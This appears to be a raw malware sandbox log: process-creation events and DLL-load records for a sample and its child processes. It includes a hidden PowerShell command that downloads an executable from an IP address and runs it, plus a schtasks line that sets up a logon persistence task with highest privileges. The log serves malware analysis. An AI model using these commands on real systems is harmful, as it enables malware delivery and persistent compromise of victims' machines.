Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE "C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE"
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Process created: unknown unknown
Source: C:\Windows\System32\wscript.exe	Process created: unknown unknown
Source: C:\ProgramData\jhbbvnx\fbpbh.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1075490021\am_no.cmd" any_word
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) \| Get-Random -Count 9 \| ForEach-Object {[char]$_})"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Process created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe "C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe"
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mshtml.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msiso.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: srpapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msimtf.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dxgi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: textinputframework.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: jscript9.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: version.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: slc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dataexchange.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d3d11.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dcomp.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: msls31.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: d2d1.dll
Source: C:\Windows\System32\mshta.exe	Section loaded: dwrite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
